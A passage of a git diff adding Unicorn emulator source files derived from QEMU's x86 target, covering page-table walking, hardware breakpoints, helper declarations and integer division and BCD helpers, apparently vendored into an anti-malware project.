vaddr = addr & TARGET_PAGE_MASK; + page_offset = vaddr & (page_size - 1); + paddr = pte + page_offset; +#endif + + // Unicorn: indentity map guest virtual address to host virtual address + vaddr = addr & TARGET_PAGE_MASK; + paddr = vaddr; + //printf(">>> map address %"PRIx64" to %"PRIx64"\n", vaddr, paddr); + + tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); + return 0; + do_fault_rsvd: + error_code |= PG_ERROR_RSVD_MASK; + do_fault_protect: + error_code |= PG_ERROR_P_MASK; + do_fault: + error_code |= (is_write << PG_ERROR_W_BIT); + if (is_user) + error_code |= PG_ERROR_U_MASK; + if (is_write1 == 2 && + (((env->efer & MSR_EFER_NXE) && + (env->cr[4] & CR4_PAE_MASK)) || + (env->cr[4] & CR4_SMEP_MASK))) + error_code |= PG_ERROR_I_D_MASK; + if (env->intercept_exceptions & (1 << EXCP0E_PAGE)) { + /* cr2 is not modified in case of exceptions */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), + addr); + } else { + env->cr[2] = addr; + } + env->error_code = error_code; + cs->exception_index = EXCP0E_PAGE; + return 1; +} + +hwaddr x86_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + target_ulong pde_addr, pte_addr; + uint64_t pte; + uint32_t page_offset; + int page_size; + + if (!(env->cr[0] & CR0_PG_MASK)) { + pte = addr & env->a20_mask; + page_size = 4096; + } else if (env->cr[4] & CR4_PAE_MASK) { + target_ulong pdpe_addr; + uint64_t pde, pdpe; + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint64_t pml4e_addr, pml4e; + int32_t sext; + + /* test virtual address sign extension */ + sext = (int64_t)addr >> 47; + if (sext != 0 && sext != -1) { + return -1; + } + pml4e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 39) & 0x1ff) << 3)) & + env->a20_mask; + pml4e = ldq_phys(cs->as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + return -1; + } + pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + + (((addr >> 30) & 0x1ff) << 3)) & env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + return -1; + } + if (pdpe & PG_PSE_MASK) { + page_size = 1024 * 1024 * 1024; + pte = pdpe; + goto out; + } + + } else +#endif + { + pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) + return -1; + } + + pde_addr = ((pdpe & PG_ADDRESS_MASK) + + (((addr >> 21) & 0x1ff) << 3)) & env->a20_mask; + pde = ldq_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + return -1; + } + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + page_size = 2048 * 1024; + pte = pde; + } else { + /* 4 KB page */ + pte_addr = ((pde & PG_ADDRESS_MASK) + + (((addr >> 12) & 0x1ff) << 3)) & env->a20_mask; + page_size = 4096; + pte = ldq_phys(cs->as, pte_addr); + } + if (!(pte & PG_PRESENT_MASK)) { + return -1; + } + } else { + uint32_t pde; + + /* page directory entry */ + pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & env->a20_mask; + pde = ldl_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) + return -1; + if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { + pte = pde | ((pde & 0x1fe000) << (32 - 13)); + page_size = 4096 * 1024; + } else { + /* page directory entry */ + pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & env->a20_mask; + pte = ldl_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + return -1; + } + page_size = 4096; + } + pte = pte & env->a20_mask; + } + +#ifdef TARGET_X86_64 +out: +#endif + pte &= PG_ADDRESS_MASK & ~(page_size - 1); + page_offset = (addr & TARGET_PAGE_MASK) & (page_size - 1); + return pte | page_offset; +} + +void hw_breakpoint_insert(CPUX86State *env, int index) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + int type = 0, err = 0; + + switch (hw_breakpoint_type(env->dr[7], index)) { + case DR7_TYPE_BP_INST: + if (hw_breakpoint_enabled(env->dr[7], index)) { + err = cpu_breakpoint_insert(cs, env->dr[index], BP_CPU, + &env->cpu_breakpoint[index]); + } + break; + case DR7_TYPE_DATA_WR: + type = BP_CPU | BP_MEM_WRITE; + break; + case DR7_TYPE_IO_RW: + /* No support for I/O watchpoints yet */ + break; + case DR7_TYPE_DATA_RW: + type = BP_CPU | BP_MEM_ACCESS; + break; + } + + if (type != 0) { + err = cpu_watchpoint_insert(cs, env->dr[index], + hw_breakpoint_len(env->dr[7], index), + type, &env->cpu_watchpoint[index]); + } + + if (err) { + env->cpu_breakpoint[index] = NULL; + } +} + +void hw_breakpoint_remove(CPUX86State *env, int index) +{ + CPUState *cs; + + if (!env->cpu_breakpoint[index]) { + return; + } + cs = CPU(x86_env_get_cpu(env)); + switch (hw_breakpoint_type(env->dr[7], index)) { + case DR7_TYPE_BP_INST: + if (hw_breakpoint_enabled(env->dr[7], index)) { + cpu_breakpoint_remove_by_ref(cs, env->cpu_breakpoint[index]); + } + break; + case DR7_TYPE_DATA_WR: + case DR7_TYPE_DATA_RW: + cpu_watchpoint_remove_by_ref(cs, env->cpu_watchpoint[index]); + break; + case DR7_TYPE_IO_RW: + /* No support for I/O watchpoints yet */ + break; + } +} + +bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update) +{ + target_ulong dr6; + int reg; + bool hit_enabled = false; + + dr6 = env->dr[6] & ~0xf; + for (reg = 0; reg < DR7_MAX_BP; reg++) { + bool bp_match = false; + bool wp_match = false; + + switch (hw_breakpoint_type(env->dr[7], reg)) { + case DR7_TYPE_BP_INST: + if (env->dr[reg] == env->eip) { + bp_match = true; + } + break; + case DR7_TYPE_DATA_WR: + case DR7_TYPE_DATA_RW: + if (env->cpu_watchpoint[reg] && + env->cpu_watchpoint[reg]->flags & BP_WATCHPOINT_HIT) { + wp_match = true; + } + break; + case DR7_TYPE_IO_RW: + break; + } + if (bp_match || wp_match) { + dr6 |= 1ULL << reg; + if (hw_breakpoint_enabled(env->dr[7], reg)) { + hit_enabled = true; + } + } + } + + if (hit_enabled || force_dr6_update) { + env->dr[6] = dr6; + } + + return hit_enabled; +} + +void breakpoint_handler(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + CPUBreakpoint *bp; + + if (cs->watchpoint_hit) { + if (cs->watchpoint_hit->flags & BP_CPU) { + cs->watchpoint_hit = NULL; + if (check_hw_breakpoints(env, false)) { + raise_exception(env, EXCP01_DB); + } else { + cpu_resume_from_signal(cs, NULL); + } + } + } else { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == env->eip) { + if (bp->flags & BP_CPU) { + check_hw_breakpoints(env, true); + raise_exception(env, EXCP01_DB); + } + break; + } + } + } +} + +typedef struct MCEInjectionParams { + X86CPU *cpu; + int bank; + uint64_t status; + uint64_t mcg_status; + uint64_t addr; + uint64_t misc; + int flags; +} MCEInjectionParams; + +void cpu_report_tpr_access(CPUX86State *env, TPRAccess access) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + cpu_restore_state(cs, cs->mem_io_pc); + + apic_handle_tpr_access_report(cpu->apic_state, env->eip, access); +} +#endif /* !CONFIG_USER_ONLY */ + +int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, + target_ulong *base, unsigned int *limit, + unsigned int *flags) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + SegmentCache *dt; + target_ulong ptr; + uint32_t e1, e2; + int index; + + if (selector & 0x4) + dt = &env->ldt; + else + dt = &env->gdt; + index = selector & ~7; + ptr = dt->base + index; + if ((uint32_t)(index + 7) > dt->limit + || cpu_memory_rw_debug(cs, ptr, (uint8_t *)&e1, sizeof(e1), 0) != 0 + || cpu_memory_rw_debug(cs, ptr+4, (uint8_t *)&e2, sizeof(e2), 0) != 0) + return 0; + + *base = ((e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000)); + *limit = (e1 & 0xffff) | (e2 & 0x000f0000); + if (e2 & DESC_G_MASK) + *limit = (*limit << 12) | 0xfff; + *flags = e2; + + return 1; +} + +#if !defined(CONFIG_USER_ONLY) +void do_cpu_init(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + CPUX86State *save = g_new(CPUX86State, 1); + int sipi = cs->interrupt_request & CPU_INTERRUPT_SIPI; + + *save = *env; + + cpu_reset(cs); + cs->interrupt_request = sipi; + memcpy(&env->start_init_save, &save->start_init_save, + offsetof(CPUX86State, end_init_save) - + offsetof(CPUX86State, start_init_save)); + g_free(save); + + apic_init_reset(env->uc, cpu->apic_state); +} + +void do_cpu_sipi(X86CPU *cpu) +{ + apic_sipi(cpu->apic_state); +} +#else +void do_cpu_init(X86CPU *cpu) +{ +} +void do_cpu_sipi(X86CPU *cpu) +{ +} +#endif + +/* Frob eflags into and out of the CPU temporary format. */ + +void x86_cpu_exec_enter(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + CC_SRC = env->eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); + env->df = 1 - (2 * ((env->eflags >> 10) & 1)); + CC_OP = CC_OP_EFLAGS; + env->eflags &= ~(DF_MASK | CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); +} + +void x86_cpu_exec_exit(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + env->eflags = cpu_compute_eflags(env); + env->eflags0 = env->eflags; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h new file mode 100644 index 0000000..d3b52d1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.h @@ -0,0 +1,227 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_FLAGS_4(cc_compute_all, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) +DEF_HELPER_FLAGS_4(cc_compute_c, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) + +DEF_HELPER_1(lock, void, env) +DEF_HELPER_1(unlock, void, env) +DEF_HELPER_3(write_eflags, void, env, tl, i32) +DEF_HELPER_1(read_eflags, tl, env) +DEF_HELPER_2(divb_AL, void, env, tl) +DEF_HELPER_2(idivb_AL, void, env, tl) +DEF_HELPER_2(divw_AX, void, env, tl) +DEF_HELPER_2(idivw_AX, void, env, tl) +DEF_HELPER_2(divl_EAX, void, env, tl) +DEF_HELPER_2(idivl_EAX, void, env, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_2(divq_EAX, void, env, tl) +DEF_HELPER_2(idivq_EAX, void, env, tl) +#endif + +DEF_HELPER_2(aam, void, env, int) +DEF_HELPER_2(aad, void, env, int) +DEF_HELPER_1(aaa, void, env) +DEF_HELPER_1(aas, void, env) +DEF_HELPER_1(daa, void, env) +DEF_HELPER_1(das, void, env) + +DEF_HELPER_2(lsl, tl, env, tl) +DEF_HELPER_2(lar, tl, env, tl) +DEF_HELPER_2(verr, void, env, tl) +DEF_HELPER_2(verw, void, env, tl) +DEF_HELPER_2(lldt, void, env, int) +DEF_HELPER_2(ltr, void, env, int) +DEF_HELPER_3(load_seg, void, env, int, int) +DEF_HELPER_4(ljmp_protected, void, env, int, tl, int) +DEF_HELPER_5(lcall_real, void, env, int, tl, int, int) +DEF_HELPER_5(lcall_protected, void, env, int, tl, int, int) +DEF_HELPER_2(iret_real, void, env, int) +DEF_HELPER_3(iret_protected, void, env, int, int) +DEF_HELPER_3(lret_protected, void, env, int, int) +DEF_HELPER_2(read_crN, tl, env, int) +DEF_HELPER_3(write_crN, void, env, int, tl) +DEF_HELPER_2(lmsw, void, env, tl) +DEF_HELPER_1(clts, void, env) +DEF_HELPER_3(movl_drN_T0, void, env, int, tl) +DEF_HELPER_2(invlpg, void, env, tl) + +DEF_HELPER_4(enter_level, void, env, int, int, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_4(enter64_level, void, env, int, int, tl) +#endif +DEF_HELPER_2(sysenter, void, env, int) +DEF_HELPER_2(sysexit, void, env, int) +#ifdef TARGET_X86_64 +DEF_HELPER_2(syscall, void, env, int) +DEF_HELPER_2(sysret, void, env, int) +#endif +DEF_HELPER_2(hlt, void, env, int) +DEF_HELPER_2(monitor, void, env, tl) +DEF_HELPER_2(mwait, void, env, int) +DEF_HELPER_2(pause, void, env, int) +DEF_HELPER_1(debug, void, env) +DEF_HELPER_1(reset_rf, void, env) +DEF_HELPER_3(raise_interrupt, void, env, int, int) +DEF_HELPER_2(raise_exception, void, env, int) +DEF_HELPER_1(cli, void, env) +DEF_HELPER_1(sti, void, env) +DEF_HELPER_1(clac, void, env) +DEF_HELPER_1(stac, void, env) +DEF_HELPER_1(set_inhibit_irq, void, env) +DEF_HELPER_1(reset_inhibit_irq, void, env) +DEF_HELPER_3(boundw, void, env, tl, int) +DEF_HELPER_3(boundl, void, env, tl, int) +DEF_HELPER_1(rsm, void, env) +DEF_HELPER_2(into, void, env, int) +DEF_HELPER_2(cmpxchg8b, void, env, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cmpxchg16b, void, env, tl) +#endif +DEF_HELPER_1(single_step, void, env) +DEF_HELPER_1(cpuid, void, env) +DEF_HELPER_1(rdtsc, void, env) +DEF_HELPER_1(rdtscp, void, env) +DEF_HELPER_1(rdpmc, void, env) +DEF_HELPER_1(rdmsr, void, env) +DEF_HELPER_1(wrmsr, void, env) + +DEF_HELPER_2(check_iob, void, env, i32) +DEF_HELPER_2(check_iow, void, env, i32) +DEF_HELPER_2(check_iol, void, env, i32) +DEF_HELPER_3(outb, void, ptr, i32, i32) +DEF_HELPER_2(inb, tl, ptr, i32) +DEF_HELPER_3(outw, void, ptr, i32, i32) +DEF_HELPER_2(inw, tl, ptr, i32) +DEF_HELPER_3(outl, void, ptr, i32, i32) +DEF_HELPER_2(inl, tl, ptr, i32) + +DEF_HELPER_3(svm_check_intercept_param, void, env, i32, i64) +DEF_HELPER_3(vmexit, void, env, i32, i64) +DEF_HELPER_4(svm_check_io, void, env, i32, i32, i32) +DEF_HELPER_3(vmrun, void, env, int, int) +DEF_HELPER_1(vmmcall, void, env) +DEF_HELPER_2(vmload, void, env, int) +DEF_HELPER_2(vmsave, void, env, int) +DEF_HELPER_1(stgi, void, env) +DEF_HELPER_1(clgi, void, env) +DEF_HELPER_1(skinit, void, env) +DEF_HELPER_2(invlpga, void, env, int) + +/* x86 FPU */ + +DEF_HELPER_2(flds_FT0, void, env, i32) +DEF_HELPER_2(fldl_FT0, void, env, i64) +DEF_HELPER_2(fildl_FT0, void, env, s32) +DEF_HELPER_2(flds_ST0, void, env, i32) +DEF_HELPER_2(fldl_ST0, void, env, i64) +DEF_HELPER_2(fildl_ST0, void, env, s32) +DEF_HELPER_2(fildll_ST0, void, env, s64) +DEF_HELPER_1(fsts_ST0, i32, env) +DEF_HELPER_1(fstl_ST0, i64, env) +DEF_HELPER_1(fist_ST0, s32, env) +DEF_HELPER_1(fistl_ST0, s32, env) +DEF_HELPER_1(fistll_ST0, s64, env) +DEF_HELPER_1(fistt_ST0, s32, env) +DEF_HELPER_1(fisttl_ST0, s32, env) +DEF_HELPER_1(fisttll_ST0, s64, env) +DEF_HELPER_2(fldt_ST0, void, env, tl) +DEF_HELPER_2(fstt_ST0, void, env, tl) +DEF_HELPER_1(fpush, void, env) +DEF_HELPER_1(fpop, void, env) +DEF_HELPER_1(fdecstp, void, env) +DEF_HELPER_1(fincstp, void, env) +DEF_HELPER_2(ffree_STN, void, env, int) +DEF_HELPER_1(fmov_ST0_FT0, void, env) +DEF_HELPER_2(fmov_FT0_STN, void, env, int) +DEF_HELPER_2(fmov_ST0_STN, void, env, int) +DEF_HELPER_2(fmov_STN_ST0, void, env, int) +DEF_HELPER_2(fxchg_ST0_STN, void, env, int) +DEF_HELPER_1(fcom_ST0_FT0, void, env) +DEF_HELPER_1(fucom_ST0_FT0, void, env) +DEF_HELPER_1(fcomi_ST0_FT0, void, env) +DEF_HELPER_1(fucomi_ST0_FT0, void, env) +DEF_HELPER_1(fadd_ST0_FT0, void, env) +DEF_HELPER_1(fmul_ST0_FT0, void, env) +DEF_HELPER_1(fsub_ST0_FT0, void, env) +DEF_HELPER_1(fsubr_ST0_FT0, void, env) +DEF_HELPER_1(fdiv_ST0_FT0, void, env) +DEF_HELPER_1(fdivr_ST0_FT0, void, env) +DEF_HELPER_2(fadd_STN_ST0, void, env, int) +DEF_HELPER_2(fmul_STN_ST0, void, env, int) +DEF_HELPER_2(fsub_STN_ST0, void, env, int) +DEF_HELPER_2(fsubr_STN_ST0, void, env, int) +DEF_HELPER_2(fdiv_STN_ST0, void, env, int) +DEF_HELPER_2(fdivr_STN_ST0, void, env, int) +DEF_HELPER_1(fchs_ST0, void, env) +DEF_HELPER_1(fabs_ST0, void, env) +DEF_HELPER_1(fxam_ST0, void, env) +DEF_HELPER_1(fld1_ST0, void, env) +DEF_HELPER_1(fldl2t_ST0, void, env) +DEF_HELPER_1(fldl2e_ST0, void, env) +DEF_HELPER_1(fldpi_ST0, void, env) +DEF_HELPER_1(fldlg2_ST0, void, env) +DEF_HELPER_1(fldln2_ST0, void, env) +DEF_HELPER_1(fldz_ST0, void, env) +DEF_HELPER_1(fldz_FT0, void, env) +DEF_HELPER_1(fnstsw, i32, env) +DEF_HELPER_1(fnstcw, i32, env) +DEF_HELPER_2(fldcw, void, env, i32) +DEF_HELPER_1(fclex, void, env) +DEF_HELPER_1(fwait, void, env) +DEF_HELPER_1(fninit, void, env) +DEF_HELPER_2(fbld_ST0, void, env, tl) +DEF_HELPER_2(fbst_ST0, void, env, tl) +DEF_HELPER_1(f2xm1, void, env) +DEF_HELPER_1(fyl2x, void, env) +DEF_HELPER_1(fptan, void, env) +DEF_HELPER_1(fpatan, void, env) +DEF_HELPER_1(fxtract, void, env) +DEF_HELPER_1(fprem1, void, env) +DEF_HELPER_1(fprem, void, env) +DEF_HELPER_1(fyl2xp1, void, env) +DEF_HELPER_1(fsqrt, void, env) +DEF_HELPER_1(fsincos, void, env) +DEF_HELPER_1(frndint, void, env) +DEF_HELPER_1(fscale, void, env) +DEF_HELPER_1(fsin, void, env) +DEF_HELPER_1(fcos, void, env) +DEF_HELPER_3(fstenv, void, env, tl, int) +DEF_HELPER_3(fldenv, void, env, tl, int) +DEF_HELPER_3(fsave, void, env, tl, int) +DEF_HELPER_3(frstor, void, env, tl, int) +DEF_HELPER_3(fxsave, void, env, tl, int) +DEF_HELPER_3(fxrstor, void, env, tl, int) + +DEF_HELPER_FLAGS_1(clz_x86, TCG_CALL_NO_RWG_SE, tl, tl) + +#ifdef TARGET_I386 +#define helper_clz helper_clz_x86 +#define gen_helper_clz gen_helper_clz_x86 +#endif + +DEF_HELPER_FLAGS_1(ctz, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_2(pdep, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(pext, TCG_CALL_NO_RWG_SE, tl, tl, tl) + +/* MMX/SSE */ + +DEF_HELPER_2(ldmxcsr, void, env, i32) +DEF_HELPER_1(enter_mmx, void, env) +DEF_HELPER_1(emms, void, env) +DEF_HELPER_3(movq, void, env, ptr, ptr) + +#define SHIFT 0 +#include "ops_sse_header.h" +#define SHIFT 1 +#include "ops_sse_header.h" + +DEF_HELPER_3(rclb, tl, env, tl, tl) +DEF_HELPER_3(rclw, tl, env, tl, tl) +DEF_HELPER_3(rcll, tl, env, tl, tl) +DEF_HELPER_3(rcrb, tl, env, tl, tl) +DEF_HELPER_3(rcrw, tl, env, tl, tl) +DEF_HELPER_3(rcrl, tl, env, tl, tl) +#ifdef TARGET_X86_64 +DEF_HELPER_3(rclq, tl, env, tl, tl) +DEF_HELPER_3(rcrq, tl, env, tl, tl) +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c new file mode 100644 index 0000000..0de38c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/int_helper.c @@ -0,0 +1,471 @@ +/* + * x86 integer helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" + +//#define DEBUG_MULDIV + +/* modulo 9 table */ +static const uint8_t rclb_table[32] = { + 0, 1, 2, 3, 4, 5, 6, 7, + 8, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 0, 1, 2, 3, 4, 5, + 6, 7, 8, 0, 1, 2, 3, 4, +}; + +/* modulo 17 table */ +static const uint8_t rclw_table[32] = { + 0, 1, 2, 3, 4, 5, 6, 7, + 8, 9, 10, 11, 12, 13, 14, 15, + 16, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, +}; + +/* division, flags are undefined */ + +void helper_divb_AL(CPUX86State *env, target_ulong t0) +{ + unsigned int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff); + den = (t0 & 0xff); + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q > 0xff) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xff; + r = (num % den) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; +} + +void helper_idivb_AL(CPUX86State *env, target_ulong t0) +{ + int num, den, q, r; + + num = (int16_t)env->regs[R_EAX]; + den = (int8_t)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q != (int8_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xff; + r = (num % den) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; +} + +void helper_divw_AX(CPUX86State *env, target_ulong t0) +{ + unsigned int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); + den = (t0 & 0xffff); + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + if (q > 0xffff) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xffff; + r = (num % den) & 0xffff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; + env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; +} + +void helper_idivw_AX(CPUX86State *env, target_ulong t0) +{ + int num, den, q, r; + + num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); + den = (int16_t)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = ((int64_t)num / den); + if (q != (int16_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + q &= 0xffff; + r = (num % den) & 0xffff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; + env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; +} + +void helper_divl_EAX(CPUX86State *env, target_ulong t0) +{ + unsigned int den, r; + uint64_t num, q; + + num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + den = (unsigned int)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + r = (num % den); + if (q > 0xffffffff) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = (uint32_t)q; + env->regs[R_EDX] = (uint32_t)r; +} + +void helper_idivl_EAX(CPUX86State *env, target_ulong t0) +{ + int den, r; + int64_t num, q; + + num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + den = (int)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + r = (num % den); + if (q != (int32_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = (uint32_t)q; + env->regs[R_EDX] = (uint32_t)r; +} + +/* bcd */ + +/* XXX: exception */ +void helper_aam(CPUX86State *env, int base) +{ + int al, ah; + + al = env->regs[R_EAX] & 0xff; + ah = al / base; + al = al % base; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_DST = al; +} + +void helper_aad(CPUX86State *env, int base) +{ + int al, ah; + + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + al = ((ah * base) + al) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al; + CC_DST = al; +} + +void helper_aaa(CPUX86State *env) +{ + int icarry; + int al, ah, af; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + + icarry = (al > 0xf9); + if (((al & 0x0f) > 9) || af) { + al = (al + 6) & 0x0f; + ah = (ah + 1 + icarry) & 0xff; + eflags |= CC_C | CC_A; + } else { + eflags &= ~(CC_C | CC_A); + al &= 0x0f; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_SRC = eflags; +} + +void helper_aas(CPUX86State *env) +{ + int icarry; + int al, ah, af; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + + icarry = (al < 6); + if (((al & 0x0f) > 9) || af) { + al = (al - 6) & 0x0f; + ah = (ah - 1 - icarry) & 0xff; + eflags |= CC_C | CC_A; + } else { + eflags &= ~(CC_C | CC_A); + al &= 0x0f; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_SRC = eflags; +} + +void helper_daa(CPUX86State *env) +{ + int old_al, al, af, cf; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + cf = eflags & CC_C; + af = eflags & CC_A; + old_al = al = env->regs[R_EAX] & 0xff; + + eflags = 0; + if (((al & 0x0f) > 9) || af) { + al = (al + 6) & 0xff; + eflags |= CC_A; + } + if ((old_al > 0x99) || cf) { + al = (al + 0x60) & 0xff; + eflags |= CC_C; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; + /* well, speed is not an issue here, so we compute the flags by hand */ + eflags |= (al == 0) << 6; /* zf */ + eflags |= parity_table[al]; /* pf */ + eflags |= (al & 0x80); /* sf */ + CC_SRC = eflags; +} + +void helper_das(CPUX86State *env) +{ + int al, al1, af, cf; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + cf = eflags & CC_C; + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + + eflags = 0; + al1 = al; + if (((al & 0x0f) > 9) || af) { + eflags |= CC_A; + if (al < 6 || cf) { + eflags |= CC_C; + } + al = (al - 6) & 0xff; + } + if ((al1 > 0x99) || cf) { + al = (al - 0x60) & 0xff; + eflags |= CC_C; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; + /* well, speed is not an issue here, so we compute the flags by hand */ + eflags |= (al == 0) << 6; /* zf */ + eflags |= parity_table[al]; /* pf */ + eflags |= (al & 0x80); /* sf */ + CC_SRC = eflags; +} + +#ifdef TARGET_X86_64 +static void add128(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) +{ + *plow += a; + /* carry test */ + if (*plow < a) { + (*phigh)++; + } + *phigh += b; +} + +static void neg128(uint64_t *plow, uint64_t *phigh) +{ + *plow = ~*plow; + *phigh = ~*phigh; + add128(plow, phigh, 1, 0); +} + +/* return TRUE if overflow */ +static int div64(uint64_t *plow, uint64_t *phigh, uint64_t b) +{ + uint64_t q, r, a1, a0; + int i, qb, ab; + + a0 = *plow; + a1 = *phigh; + if (a1 == 0) { + q = a0 / b; + r = a0 % b; + *plow = q; + *phigh = r; + } else { + if (a1 >= b) { + return 1; + } + /* XXX: use a better algorithm */ + for (i = 0; i < 64; i++) { + ab = a1 >> 63; + a1 = (a1 << 1) | (a0 >> 63); + if (ab || a1 >= b) { + a1 -= b; + qb = 1; + } else { + qb = 0; + } + a0 = (a0 << 1) | qb; + } +#if defined(DEBUG_MULDIV) + printf("div: 0x%016" PRIx64 "%016" PRIx64 " / 0x%016" PRIx64 + ": q=0x%016" PRIx64 " r=0x%016" PRIx64 "\n", + *phigh, *plow, b, a0, a1); +#endif + *plow = a0; + *phigh = a1; + } + return 0; +} + +/* return TRUE if overflow */ +static int idiv64(uint64_t *plow, uint64_t *phigh, int64_t b) +{ + int sa, sb; + + sa = ((int64_t)*phigh < 0); + if (sa) { + neg128(plow, phigh); + } + sb = (b < 0); + if (sb && (b != 0x8000000000000000LL)) { + b = -b; + } + if (div64(plow, phigh, b) != 0) 